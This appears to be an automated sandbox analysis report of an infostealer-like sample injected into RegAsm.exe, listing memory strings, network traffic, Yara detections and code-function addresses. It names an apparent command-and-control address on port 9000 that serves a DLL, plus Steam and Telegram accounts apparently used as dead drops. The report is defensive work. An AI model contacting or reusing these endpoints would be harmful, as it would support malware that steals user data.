Source: RegAsm.exe, 00000002.00000002.2900987028.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/v
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dll
Source: RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dll.
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dllO
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dllUser
Source: RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dllc
Source: RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dllets
Source: RegAsm.exe, 00000002.00000002.2900806294.000000000138F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000/vcruntime140.dllh
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:900062b1c
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000EB
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000ing
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://116.202.5.235:9000l
Source: FHJEGI.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: FHJEGI.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FHJEGI.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FHJEGI.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGAFt&a
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=soQOTmUz
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6MtR
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=L3Ed_Gybseku&l=e
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.s
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: FHJEGI.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FHJEGI.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: FHJEGI.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/_
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000002.1645416850.0000000000158000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
Source: RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322C
Source: RegAsm.exe, 00000002.00000002.2900507814.0000000001272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199686524322P
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp, DHCFID.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: DHCFID.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp, DHCFID.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: DHCFID.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k0mono
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k0monoHi
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: FHJEGI.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: FHJEGI.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000002.00000002.2900666615.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_004112FD

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014D4D0	0_2_0014D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001442CF	0_2_001442CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0014771B	0_2_0014771B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041C07A	2_2_0041C07A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E190	2_2_0041E190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041BB29	2_2_0041BB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041CCA7	2_2_0041CCA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19244CF0	2_2_19244CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192E5940	2_2_192E5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19231C9E	2_2_19231C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19359A20	2_2_19359A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19232018	2_2_19232018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923292D	2_2_1923292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19399CC0	2_2_19399CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192312A8	2_2_192312A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19232AA9	2_2_19232AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19249000	2_2_19249000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19355040	2_2_19355040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192C53B0	2_2_192C53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19233580	2_2_19233580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1940D209	2_2_1940D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19399430	2_2_19399430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192D9690	2_2_192D9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192ED6D0	2_2_192ED6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19231EF1	2_2_19231EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19334A60	2_2_19334A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19258D2A	2_2_19258D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192B8120	2_2_192B8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19358030	2_2_19358030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192B0090	2_2_192B0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19233AB2	2_2_19233AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19370480	2_2_19370480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19258763	2_2_19258763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19294760	2_2_19294760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192C8760	2_2_192C8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19258680	2_2_19258680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923251D	2_2_1923251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1925BAB0	2_2_1925BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923290A	2_2_1923290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923174E	2_2_1923174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19263370	2_2_19263370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1934A900	2_2_1934A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1932A940	2_2_1932A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_193169C0	2_2_193169C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19233E3B	2_2_19233E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1936E800	2_2_1936E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923481D	2_2_1923481D
